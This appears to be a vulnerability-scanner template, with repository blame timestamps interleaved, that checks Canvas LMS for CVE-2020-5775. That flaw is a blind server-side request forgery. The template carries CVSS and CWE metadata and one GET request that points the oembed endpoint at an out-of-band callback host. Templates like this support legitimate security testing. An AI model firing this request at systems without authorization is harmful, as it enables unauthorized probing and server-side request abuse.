2021-11-24 14:57:58 +00:00
id : CVE-2020-5775
info :
2023-04-18 13:53:50 +00:00
name : Canvas LMS v2020-07-29 - Blind Server-Side Request Forgery
2021-11-24 14:57:58 +00:00
author : alph4byt3
severity : medium
2023-04-18 13:53:50 +00:00
description : Canvas version 2020-07-29 is susceptible to blind server-side request forgery. An attacker can cause Canvas to perform HTTP GET requests to arbitrary domains and thus potentially access sensitive information, modify data, and/or execute unauthorized operations.
2021-11-24 14:57:58 +00:00
reference :
- https://www.tenable.com/security/research/tra-2020-49
2023-04-04 19:45:42 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2020-5775
2021-11-28 20:49:07 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 5.8
2021-11-28 20:49:07 +00:00
cve-id : CVE-2020-5775
cwe-id : CWE-918
2023-07-11 19:49:27 +00:00
epss-score : 0.00189
cpe : cpe:2.3:a:instructure:canvas_learning_management_service:2020-07-29:*:*:*:*:*:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : instructure
product : canvas_learning_management_service
tags : cve,cve2020,ssrf,oast,blind,tenable
2021-11-24 14:57:58 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-11-24 14:57:58 +00:00
- method : GET
path :
- "{{BaseURL}}/external_content/retrieve/oembed?endpoint=http://{{interactsh-url}}&url=foo"
matchers :
- type : word
part : interactsh_protocol # Confirms the HTTP Interaction
words :
- "http"